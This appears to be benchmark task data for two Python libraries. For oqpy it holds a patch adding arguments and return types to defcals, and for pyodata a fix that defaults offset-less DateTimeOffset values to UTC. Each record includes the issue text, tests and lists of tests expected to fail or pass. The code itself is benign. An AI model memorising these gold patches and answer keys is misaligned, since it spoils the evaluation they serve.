-def angle_(size: int) -> ast.AngleType:
+def angle_(size: int | None = None) -> ast.AngleType:
"""Create a sized angle type."""
- return ast.AngleType(ast.IntegerLiteral(size))
+ return ast.AngleType(ast.IntegerLiteral(size) if size is not None else None)
def complex_(size: int) -> ast.ComplexType:
@@ -107,14 +109,15 @@ def complex_(size: int) -> ast.ComplexType:
return ast.ComplexType(ast.FloatType(ast.IntegerLiteral(size // 2)))
-def bit_(size: int) -> ast.BitType:
+def bit_(size: int | None = None) -> ast.BitType:
"""Create a sized bit type."""
- return ast.BitType(ast.IntegerLiteral(size))
+ return ast.BitType(ast.IntegerLiteral(size) if size is not None else None)
duration = ast.DurationType()
stretch = ast.StretchType()
bool_ = ast.BoolType()
+bit = ast.BitType()
bit8 = bit_(8)
int32 = int_(32)
int64 = int_(64)
@@ -136,6 +139,22 @@ def convert_range(program: Program, item: Union[slice, range]) -> ast.RangeDefin
)
+class Identifier(OQPyExpression):
+ """Base class to specify constant symbols."""
+
+ name: str
+
+ def __init__(self, name: str) -> None:
+ self.type = None
+ self.name = name
+
+ def to_ast(self, program: Program) -> ast.Expression:
+ return ast.Identifier(name=self.name)
+
+
+pi = Identifier(name="pi")
+
+
class _ClassicalVar(Var, OQPyExpression):
"""Base type for variables with classical type.
diff --git a/oqpy/program.py b/oqpy/program.py
index 5e2e440..49c7d52 100644
--- a/oqpy/program.py
+++ b/oqpy/program.py
@@ -82,7 +82,9 @@ class Program:
def __init__(self, version: Optional[str] = "3.0") -> None:
self.stack: list[ProgramState] = [ProgramState()]
- self.defcals: dict[tuple[tuple[str, ...], str], ast.CalibrationDefinition] = {}
+ self.defcals: dict[
+ tuple[tuple[str, ...], str, tuple[str, ...]], ast.CalibrationDefinition
+ ] = {}
self.subroutines: dict[str, ast.SubroutineDefinition] = {}
self.externs: dict[str, ast.ExternDeclaration] = {}
self.declared_vars: dict[str, Var] = {}
@@ -196,13 +198,17 @@ class Program:
self.subroutines[name] = stmt
def _add_defcal(
- self, qubit_names: list[str], name: str, stmt: ast.CalibrationDefinition
+ self,
+ qubit_names: list[str],
+ name: str,
+ arguments: list[str],
+ stmt: ast.CalibrationDefinition,
) -> None:
"""Register a defcal defined in this program.
Defcals are added to the top of the program upon conversion to ast.
"""
- self.defcals[(tuple(qubit_names), name)] = stmt
+ self.defcals[(tuple(qubit_names), name, tuple(arguments))] = stmt
def _make_externs_statements(self, auto_encal: bool = False) -> list[ast.ExternDeclaration]:
"""Return a list of extern statements for inclusion at beginning of program.
diff --git a/oqpy/quantum_types.py b/oqpy/quantum_types.py
index 44c1a12..6ca4368 100644
--- a/oqpy/quantum_types.py
+++ b/oqpy/quantum_types.py
@@ -18,11 +18,13 @@
from __future__ import annotations
import contextlib
-from typing import TYPE_CHECKING, Iterator, Union
+from typing import TYPE_CHECKING, Iterator, Optional, Union
from openpulse import ast
+from openpulse.printer import dumps
-from oqpy.base import Var
+from oqpy.base import AstConvertible, Var, to_ast
+from oqpy.classical_types import _ClassicalVar
if TYPE_CHECKING:
from oqpy.program import Program
@@ -64,30 +66,57 @@ class QubitArray:
@contextlib.contextmanager
-def defcal(program: Program, qubits: Union[Qubit, list[Qubit]], name: str) -> Iterator[None]:
+def defcal(
+ program: Program,
+ qubits: Union[Qubit, list[Qubit]],
+ name: str,
+ arguments: Optional[list[AstConvertible]] = None,
+ return_type: Optional[ast.ClassicalType] = None,
+) -> Union[Iterator[None], Iterator[list[_ClassicalVar]], Iterator[_ClassicalVar]]:
"""Context manager for creating a defcal.
.. code-block:: python
- with defcal(program, q1, "X"):
+ with defcal(program, q1, "X", [AngleVar(name="theta"), oqpy.pi/2], oqpy.bit) as theta:
program.play(frame, waveform)
"""
- program._push()
- yield
- state = program._pop()
-
if isinstance(qubits, Qubit):
qubits = [qubits]
+ assert return_type is None or isinstance(return_type, ast.ClassicalType)
+
+ arguments_ast = []
+ variables = []
+ if arguments is not None:
+ for arg in arguments:
+ if isinstance(arg, _ClassicalVar):
+ arguments_ast.append(
+ ast.ClassicalArgument(type=arg.type, name=ast.Identifier(name=arg.name))
+ )
+ arg._needs_declaration = False
+ variables.append(arg)
+ else:
+ arguments_ast.append(to_ast(program, arg))
+
+ program._push()
+ if len(variables) > 1:
+ yield variables
+ elif len(variables) == 1:
+ yield variables[0]
+ else:
+ yield
+ state = program._pop()
stmt = ast.CalibrationDefinition(
ast.Identifier(name),
- [], # TODO (#52): support arguments
+ arguments_ast,
[ast.Identifier(q.name) for q in qubits],
- None, # TODO (#52): support return type,
+ return_type,
state.body,
)
program._add_statement(stmt)
- program._add_defcal([qubit.name for qubit in qubits], name, stmt)
+ program._add_defcal(
+ [qubit.name for qubit in qubits], name, [dumps(a) for a in arguments_ast], stmt
+ )
@contextlib.contextmanager
|
openqasm/oqpy
|
32cb438a101700af6c2b5c9be7d86d5ee2314ee6
|
diff --git a/tests/test_directives.py b/tests/test_directives.py
index 24115ef..e10271e 100644
--- a/tests/test_directives.py
+++ b/tests/test_directives.py
@@ -22,6 +22,7 @@ import numpy as np
import pytest
from openpulse.printer import dumps
+import oqpy
from oqpy import *
from oqpy.base import expr_matches
from oqpy.quantum_types import PhysicalQubits
@@ -188,7 +189,10 @@ def test_binary_expressions():
i = IntVar(5, "i")
j = IntVar(2, "j")
prog.set(i, 2 * (i + j))
- prog.set(j, 2 % (2 + i) % 2)
+ prog.set(j, 2 % (2 - i) % 2)
+ prog.set(j, 1 + oqpy.pi)
+ prog.set(j, 1 / oqpy.pi**2 / 2 + 2**oqpy.pi)
+ prog.set(j, -oqpy.pi * oqpy.pi - i**j)
expected = textwrap.dedent(
"""
@@ -196,7 +200,10 @@ def test_binary_expressions():
int[32] i = 5;
int[32] j = 2;
i = 2 * (i + j);
- j = 2 % (2 + i) % 2;
+ j = 2 % (2 - i) % 2;
+ j = 1 + pi;
+ j = 1 / pi ** 2 / 2 + 2 ** pi;
+ j = -pi * pi - i ** j;
"""
).strip()
@@ -506,6 +513,154 @@ def test_set_shift_frequency():
assert prog.to_qasm() == expected
+def test_defcals():
+ prog = Program()
+ constant = declare_waveform_generator("constant", [("length", duration), ("iq", complex128)])
+
+ q_port = PortVar("q_port")
+ rx_port = PortVar("rx_port")
+ tx_port = PortVar("tx_port")
+ q_frame = FrameVar(q_port, 6.431e9, name="q_frame")
+ rx_frame = FrameVar(rx_port, 5.752e9, name="rx_frame")
+ tx_frame = FrameVar(tx_port, 5.752e9, name="tx_frame")
+
+ q1 = PhysicalQubits[1]
+ q2 = PhysicalQubits[2]
+
+ with defcal(prog, q2, "x"):
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "rx", [AngleVar(name="theta")]) as theta:
+ prog.increment(theta, 0.1)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "rx", [pi / 3]):
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, [q1, q2], "xy", [AngleVar(name="theta"), +pi / 2]) as theta:
+ prog.increment(theta, 0.1)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, [q1, q2], "xy", [AngleVar(name="theta"), FloatVar(name="phi"), 10]) as params:
+ theta, phi = params
+ prog.increment(theta, 0.1)
+ prog.increment(phi, 0.2)
+ prog.play(q_frame, constant(1e-6, 0.1))
+
+ with defcal(prog, q2, "readout", return_type=oqpy.bit):
+ prog.play(tx_frame, constant(2.4e-6, 0.2))
+ prog.capture(rx_frame, constant(2.4e-6, 1))
+
+ with pytest.raises(AssertionError):
+
+ with defcal(prog, q2, "readout", return_type=bool):
+ prog.play(tx_frame, constant(2.4e-6, 0.2))
+ prog.capture(rx_frame, constant(2.4e-6, 1))
+
+ expected = textwrap.dedent(
+ """
+ OPENQASM 3.0;
+ extern constant(duration, complex[float[64]]) -> waveform;
+ port rx_port;
+ port tx_port;
+ port q_port;
+ frame q_frame = newframe(q_port, 6431000000.0, 0);
+ frame tx_frame = newframe(tx_port, 5752000000.0, 0);
+ frame rx_frame = newframe(rx_port, 5752000000.0, 0);
+ defcal x $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal rx(angle[32] theta) $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal rx(pi / 3) $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal xy(angle[32] theta, pi / 2) $1, $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal xy(angle[32] theta, float[64] phi, 10) $1, $2 {
+ theta += 0.1;
+ phi += 0.2;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ defcal readout $2 -> bit {
+ play(tx_frame, constant(2400.0ns, 0.2));
+ capture(rx_frame, constant(2400.0ns, 1));
+ }
+ """
+ ).strip()
+ assert prog.to_qasm() == expected
+
+ expect_defcal_rx_theta = textwrap.dedent(
+ """
+ defcal rx(angle[32] theta) $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "rx", ("angle[32] theta",))], indent=" ").strip()
+ == expect_defcal_rx_theta
+ )
+ expect_defcal_rx_pio2 = textwrap.dedent(
+ """
+ defcal rx(pi / 3) $2 {
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "rx", ("pi / 3",))], indent=" ").strip()
+ == expect_defcal_rx_pio2
+ )
+ expect_defcal_xy_theta_pio2 = textwrap.dedent(
+ """
+ defcal xy(angle[32] theta, pi / 2) $1, $2 {
+ theta += 0.1;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(
+ prog.defcals[(("$1", "$2"), "xy", ("angle[32] theta", "pi / 2"))], indent=" "
+ ).strip()
+ == expect_defcal_xy_theta_pio2
+ )
+ expect_defcal_xy_theta_phi = textwrap.dedent(
+ """
+ defcal xy(angle[32] theta, float[64] phi, 10) $1, $2 {
+ theta += 0.1;
+ phi += 0.2;
+ play(q_frame, constant(1000.0ns, 0.1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(
+ prog.defcals[(("$1", "$2"), "xy", ("angle[32] theta", "float[64] phi", "10"))],
+ indent=" ",
+ ).strip()
+ == expect_defcal_xy_theta_phi
+ )
+ expect_defcal_readout_q2 = textwrap.dedent(
+ """
+ defcal readout $2 -> bit {
+ play(tx_frame, constant(2400.0ns, 0.2));
+ capture(rx_frame, constant(2400.0ns, 1));
+ }
+ """
+ ).strip()
+ assert (
+ dumps(prog.defcals[(("$2",), "readout", ())], indent=" ").strip()
+ == expect_defcal_readout_q2
+ )
+
+
def test_ramsey_example():
prog = Program()
constant = declare_waveform_generator("constant", [("length", duration), ("iq", complex128)])
@@ -620,8 +775,11 @@ def test_ramsey_example():
).strip()
assert prog.to_qasm() == expected
- assert dumps(prog.defcals[(("$2",), "x90")], indent=" ").strip() == expect_defcal_x90_q2
- assert dumps(prog.defcals[(("$2",), "readout")], indent=" ").strip() == expect_defcal_readout_q2
+ assert dumps(prog.defcals[(("$2",), "x90", ())], indent=" ").strip() == expect_defcal_x90_q2
+ assert (
+ dumps(prog.defcals[(("$2",), "readout", ())], indent=" ").strip()
+ == expect_defcal_readout_q2
+ )
def test_rabi_example():
@@ -748,11 +906,11 @@ def test_program_add():
).strip()
assert (
- dumps(prog2.defcals[(("$1", "$2"), "two_qubit_gate")], indent=" ").strip()
+ dumps(prog2.defcals[(("$1", "$2"), "two_qubit_gate", ())], indent=" ").strip()
== expected_defcal_two_qubit_gate
)
assert (
- dumps(prog.defcals[(("$1", "$2"), "two_qubit_gate")], indent=" ").strip()
+ dumps(prog.defcals[(("$1", "$2"), "two_qubit_gate", ())], indent=" ").strip()
== expected_defcal_two_qubit_gate
)
|
Support classical arguments and return types for defcals
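
For orientation, below is a minimal sketch of the usage this request implies, pieced together from the patch docstring and the test patch above. It is illustrative only: the classical-argument list and the `return_type` parameter are the new pieces being requested and only exist once the patch is applied; every other name mirrors the test file in this record.

```python
# Illustrative sketch only: assumes an oqpy build that already includes the
# patch above; the argument list and return_type keyword are the new API.
import oqpy
from oqpy import (
    AngleVar, FrameVar, PortVar, Program,
    complex128, declare_waveform_generator, defcal, duration,
)
from oqpy.quantum_types import PhysicalQubits

prog = Program()
constant = declare_waveform_generator("constant", [("length", duration), ("iq", complex128)])
q_frame = FrameVar(PortVar("q_port"), 6.431e9, name="q_frame")
q2 = PhysicalQubits[2]

# Old form: gate name only.
with defcal(prog, q2, "x"):
    prog.play(q_frame, constant(1e-6, 0.1))

# Requested form: classical arguments, yielded back as variables ...
with defcal(prog, q2, "rx", [AngleVar(name="theta")]) as theta:
    prog.increment(theta, 0.1)
    prog.play(q_frame, constant(1e-6, 0.1))

# ... and an optional classical return type.
with defcal(prog, q2, "readout", return_type=oqpy.bit):
    prog.play(q_frame, constant(2.4e-6, 0.2))

print(prog.to_qasm())
```

With the patch applied, this emits `defcal rx(angle[32] theta) $2 { ... }` and `defcal readout $2 -> bit { ... }` blocks like those asserted in the test patch.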
|
0.0
|
32cb438a101700af6c2b5c9be7d86d5ee2314ee6
|
[
"tests/test_directives.py::test_binary_expressions",
"tests/test_directives.py::test_defcals",
"tests/test_directives.py::test_ramsey_example",
"tests/test_directives.py::test_program_add"
] |
[
"tests/test_directives.py::test_version_string",
"tests/test_directives.py::test_variable_declaration",
"tests/test_directives.py::test_complex_numbers_declaration",
"tests/test_directives.py::test_non_trivial_variable_declaration",
"tests/test_directives.py::test_variable_assignment",
"tests/test_directives.py::test_measure_reset",
"tests/test_directives.py::test_bare_if",
"tests/test_directives.py::test_if_else",
"tests/test_directives.py::test_for_in",
"tests/test_directives.py::test_while",
"tests/test_directives.py::test_create_frame",
"tests/test_directives.py::test_subroutine_with_return",
"tests/test_directives.py::test_box_and_timings",
"tests/test_directives.py::test_play_capture",
"tests/test_directives.py::test_set_shift_frequency",
"tests/test_directives.py::test_rabi_example",
"tests/test_directives.py::test_expression_convertible",
"tests/test_directives.py::test_waveform_extern_arg_passing",
"tests/test_directives.py::test_needs_declaration",
"tests/test_directives.py::test_discrete_waveform",
"tests/test_directives.py::test_var_and_expr_matches",
"tests/test_directives.py::test_program_tracks_frame_waveform_vars",
"tests/test_directives.py::test_make_duration",
"tests/test_directives.py::test_autoencal",
"tests/test_directives.py::test_ramsey_example_blog"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-10 03:26:44+00:00
|
apache-2.0
| 4,418
|
|
SAP__python-pyodata-232
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 0f876b9..7175a5d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,8 @@ and this project adheres to [Semantic Versioning](http://semver.org/).
## [Unreleased]
+- model: fix edge case for Edm.DateTimeOffset.from_json() without offset - Petr Hanak
+
## [1.10.0]
### Added
diff --git a/pyodata/v2/model.py b/pyodata/v2/model.py
index 065f93e..4f15c84 100644
--- a/pyodata/v2/model.py
+++ b/pyodata/v2/model.py
@@ -529,6 +529,12 @@ class EdmDateTimeOffsetTypTraits(EdmPrefixedTypTraits):
return f'/Date({ticks}{offset_in_minutes:+05})/'
def from_json(self, value):
+ # special edge case:
+# datetimeoffset'yyyy-mm-ddThh:mm[:ss]' = defaults to UTC, when the offset value is not provided in the response data by the service but the metadata is EdmDateTimeOffset
+ # intentionally just for from_json, generation of to_json should always provide timezone info
+ if re.match(r"^/Date\((?P<milliseconds_since_epoch>-?\d+)\)/$", value):
+ value = value.replace(')', '+0000)')
+
matches = re.match(r"^/Date\((?P<milliseconds_since_epoch>-?\d+)(?P<offset_in_minutes>[+-]\d+)\)/$", value)
try:
milliseconds_since_epoch = matches.group('milliseconds_since_epoch')
|
SAP/python-pyodata
|
5d1490871f4b824a82dd6eaa148444a99ea4f47d
|
diff --git a/tests/test_model_v2.py b/tests/test_model_v2.py
index 5bdef48..258dde7 100644
--- a/tests/test_model_v2.py
+++ b/tests/test_model_v2.py
@@ -690,6 +690,9 @@ def test_traits_datetimeoffset(type_date_time_offset):
def test_traits_datetimeoffset_to_literal(type_date_time_offset):
"""Test Edm.DateTimeOffset trait: Python -> literal"""
+ testdate = datetime(1, 1, 1, 0, 0, 0, 0, tzinfo=timezone.utc)
+ assert type_date_time_offset.traits.to_literal(testdate) == "datetimeoffset'0001-01-01T00:00:00+00:00'"
+
testdate = datetime(2005, 1, 28, 18, 30, 44, 123456, tzinfo=timezone(timedelta(hours=3, minutes=40)))
assert type_date_time_offset.traits.to_literal(testdate) == "datetimeoffset'2005-01-28T18:30:44.123456+03:40'"
@@ -746,7 +749,7 @@ def test_traits_datetimeoffset_from_invalid_literal(type_date_time_offset):
assert str(e_info.value).startswith('Cannot decode datetimeoffset from value xyz')
-def test_traits_datetimeoffset_from_odata(type_date_time_offset):
+def test_traits_datetimeoffset_from_json(type_date_time_offset):
"""Test Edm.DateTimeOffset trait: OData -> Python"""
# parsing full representation
@@ -768,6 +771,14 @@ def test_traits_datetimeoffset_from_odata(type_date_time_offset):
assert testdate.microsecond == 0
assert testdate.tzinfo == timezone(-timedelta(minutes=5))
+ # parsing special edge case with no offset provided, defaults to UTC
+ testdate = type_date_time_offset.traits.from_json("/Date(217567986000)/")
+ assert testdate.year == 1976
+ assert testdate.minute == 33
+ assert testdate.second == 6
+ assert testdate.microsecond == 0
+ assert testdate.tzinfo == timezone.utc
+
# parsing below lowest value with workaround
pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = True
testdate = type_date_time_offset.traits.from_json("/Date(-62135596800001+0001)/")
|
Malformed value for primitive Edm.DateTimeOffset type
We have been using pyodata v1.7.1 for a long time, and I tried to update to the latest v1.10.0 version. But now I get this error when querying data from the OData service:
```
Traceback (most recent call last):
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 534, in from_json
milliseconds_since_epoch = matches.group('milliseconds_since_epoch')
AttributeError: 'NoneType' object has no attribute 'group'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/prefect/engine.py", line 1192, in orchestrate_task_run
result = await run_sync(task.fn, *args, **kwargs)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/prefect/utilities/asyncutils.py", line 57, in run_sync_in_worker_thread
return await anyio.to_thread.run_sync(call, cancellable=True)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/to_thread.py", line 31, in run_sync
return await get_asynclib().run_sync_in_worker_thread(
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 937, in run_sync_in_worker_thread
return await future
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 867, in run
result = context.run(func, *args)
File "/workspace/odatavenv/flow_utilities/prefect/tasks/odata.py", line 60, in fetch_odata
for cnt, batch in enumerate(batches, start=1):
File "/workspace/odatavenv/flow_utilities/api/odata.py", line 114, in query_all
yield list(self.query(skip, top))
File "/workspace/odatavenv/flow_utilities/api/odata.py", line 98, in query
response = self._entity_service().skip(skip).top(top).execute()
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 349, in execute
return self._call_handler(response)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 362, in _call_handler
return self._handler(response)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 1509, in get_entities_handler
entity = EntityProxy(self._service, self._entity_set, self._entity_set.entity_type, props)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 814, in __init__
self._cache[type_proprty.name] = type_proprty.from_json(proprties[type_proprty.name])
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 872, in from_json
return self.typ.traits.from_json(value)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 537, in from_json
raise PyODataModelError(
pyodata.exceptions.PyODataModelError: Malformed value /Date(1599659339088)/ for primitive Edm.DateTimeOffset type. Expected format is /Date(<ticks>±<offset>)/
```
Maybe this is related to our instance, because it returns incompatible dates (see https://github.com/SAP/python-pyodata/issues/143).
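
To make the failure concrete: the service returns `/Date(1599659339088)/` with no offset suffix, which the stricter parsing introduced after v1.7.1 rejects. The snippet below is a self-contained sketch of that parse and of the UTC-default workaround from the patch above; it re-implements the regex handling purely for illustration and is not pyodata's actual code path (the epoch arithmetic in particular is simplified).

```python
import re
from datetime import datetime, timedelta, timezone

def from_json(value: str) -> datetime:
    """Sketch of Edm.DateTimeOffset JSON parsing with the UTC-default edge case."""
    # Edge case from the patch: no offset at all, e.g. "/Date(1599659339088)/".
    # Treat it as UTC by appending a zero offset before the strict parse.
    if re.match(r"^/Date\((?P<ms>-?\d+)\)/$", value):
        value = value.replace(')', '+0000)')

    matches = re.match(r"^/Date\((?P<ms>-?\d+)(?P<offset>[+-]\d+)\)/$", value)
    if matches is None:
        raise ValueError(f"Malformed value {value} for primitive Edm.DateTimeOffset type")

    ms = int(matches.group('ms'))
    offset = timezone(timedelta(minutes=int(matches.group('offset'))))
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).astimezone(offset)

print(from_json("/Date(1599659339088)/"))      # now parses as a UTC datetime instead of raising
print(from_json("/Date(217567986000+0060)/"))  # explicit offsets are still honoured
```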
|
0.0
|
5d1490871f4b824a82dd6eaa148444a99ea4f47d
|
[
"tests/test_model_v2.py::test_traits_datetimeoffset_from_json"
] |
[
"tests/test_model_v2.py::test_edmx",
"tests/test_model_v2.py::test_schema_entity_type_nullable",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[Name-False-Name",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[ID-True-Customer",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[City-False-City",
"tests/test_model_v2.py::test_schema_entity_sets",
"tests/test_model_v2.py::test_edmx_associations",
"tests/test_model_v2.py::test_edmx_navigation_properties",
"tests/test_model_v2.py::test_edmx_function_imports",
"tests/test_model_v2.py::test_edmx_complex_types",
"tests/test_model_v2.py::test_edmx_complex_type_prop_vh",
"tests/test_model_v2.py::test_traits",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05:06.000007-expected0]",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05:06-expected1]",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05-expected2]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:05:61]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:61]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T24:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-32T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-13-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-00-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[01-02-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:05.AAA]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[]",
"tests/test_model_v2.py::test_traits_datetime",
"tests/test_model_v2.py::test_traits_datetime_with_offset_from_json",
"tests/test_model_v2.py::test_traits_datetime_with_offset_to_json[python_datetime0-/Date(217567986123)/-With",
"tests/test_model_v2.py::test_traits_datetime_with_offset_to_json[python_datetime1-/Date(217567986000)/-No",
"tests/test_model_v2.py::test_traits_datetimeoffset",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_literal",
"tests/test_model_v2.py::test_traits_invalid_datetimeoffset_to_literal",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime0-/Date(217567986123+0000)/-UTC]",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime1-/Date(217567986000+0840)/-+14",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime2-/Date(217567986000-0720)/--12",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06.654321+12:11'-expected0-Full",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06+12:11'-expected1-No",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06-01:00'-expected2-Negative",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06-01:00'-expected3-lowercase",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06+00:00'-expected4-+00:00",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06-00:00'-expected5--00:00",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06Z'-expected6-Z",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06+12:00'-expected7-On",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06-12:00'-expected8-Minimum",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06+14:00'-expected9-Maximum",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_invalid_literal",
"tests/test_model_v2.py::test_traits_collections",
"tests/test_model_v2.py::test_type_parsing",
"tests/test_model_v2.py::test_types",
"tests/test_model_v2.py::test_complex_serializer",
"tests/test_model_v2.py::test_annot_v_l_missing_e_s",
"tests/test_model_v2.py::test_annot_v_l_missing_e_t",
"tests/test_model_v2.py::test_annot_v_l_trgt_inv_prop",
"tests/test_model_v2.py::test_namespace_with_periods",
"tests/test_model_v2.py::test_edmx_entity_sets",
"tests/test_model_v2.py::test_config_set_default_error_policy",
"tests/test_model_v2.py::test_null_type",
"tests/test_model_v2.py::test_faulty_association",
"tests/test_model_v2.py::test_faulty_association_set",
"tests/test_model_v2.py::test_missing_association_for_navigation_property",
"tests/test_model_v2.py::test_edmx_association_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_entity_set",
"tests/test_model_v2.py::test_missing_data_service",
"tests/test_model_v2.py::test_missing_schema",
"tests/test_model_v2.py::test_namespace_whitelist",
"tests/test_model_v2.py::test_unsupported_edmx_n",
"tests/test_model_v2.py::test_unsupported_schema_n",
"tests/test_model_v2.py::test_whitelisted_edm_namespace",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2006_04",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2007_05",
"tests/test_model_v2.py::test_enum_parsing",
"tests/test_model_v2.py::test_unsupported_enum_underlying_type",
"tests/test_model_v2.py::test_enum_value_out_of_range",
"tests/test_model_v2.py::test_missing_property_referenced_in_annotation",
"tests/test_model_v2.py::test_struct_type_has_property_initial_instance",
"tests/test_model_v2.py::test_struct_type_has_property_no",
"tests/test_model_v2.py::test_struct_type_has_property_yes",
"tests/test_model_v2.py::test_invalid_xml"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-09-23 14:08:18+00:00
|
apache-2.0
| 666
|